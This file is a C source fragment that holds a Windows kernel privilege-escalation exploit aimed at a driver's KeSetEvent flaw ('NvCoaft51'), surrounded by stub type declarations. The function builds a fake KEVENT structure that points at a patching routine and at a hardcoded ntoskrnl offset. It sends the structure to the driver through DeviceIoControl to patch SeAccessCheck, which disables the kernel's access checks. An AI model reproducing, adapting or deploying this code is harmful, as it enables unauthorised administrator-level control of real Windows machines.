
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int WORD ;
typedef int VOID ;
typedef scalar_t__ PBYTE ;
typedef int HANDLE ;
typedef int DWORD ;
typedef int Buffer ;
typedef int BYTE ;
typedef int BOOL ;


 int DebugBreak () ;
 int DeviceIoControl (int ,int ,int*,int,int*,int,int*,int *) ;
 int XPLT_KEVENT_IOCTL ;
 int printf (char*) ;
 scalar_t__ xpltPatchAndGo ;

VOID
xpltExecuteExploit(HANDLE hDevice, PBYTE pNtosBase, BOOL bPaeKernel)
{





  if(!bPaeKernel)
  {
    printf("(-)This exploit is only runs on a PAE kernel system. Sorry.\n");
  }
  else
  {
    DWORD dwReturnedBytes;
    DWORD Buffer[1024];



    DWORD Event[31];

    printf("(*)Trying to exploit the NvCoaft51 KeSetEvent vuln...\n");
    printf("(*)Writing fake event struct...\n");

    *(BYTE*)Event = 1;

    Event[2] = (DWORD)&(Event[3]);


    Event[3] = (DWORD)&(Event[4]);


    ((WORD*)Event)[17] = 1;

    Event[5] = (DWORD)&(Event[7]);


    Event[7] = (DWORD)xpltPatchAndGo;







    Event[30] = (DWORD)&(Event[10]);
    Event[10] = 0x000021FF;

    Event[11] = (DWORD)(pNtosBase + 0x291B4);




    Buffer[0] = (DWORD)(((PBYTE)(&Event)) - 0x84C);


    printf("(*)Sending IOCTL...\n");
    DeviceIoControl(hDevice,XPLT_KEVENT_IOCTL,Buffer,sizeof(Buffer),Buffer,sizeof(Buffer),&dwReturnedBytes,((void*)0));
    printf("(+)IOCT sent. SeAccessCheck is now patched???\n");
  }
}
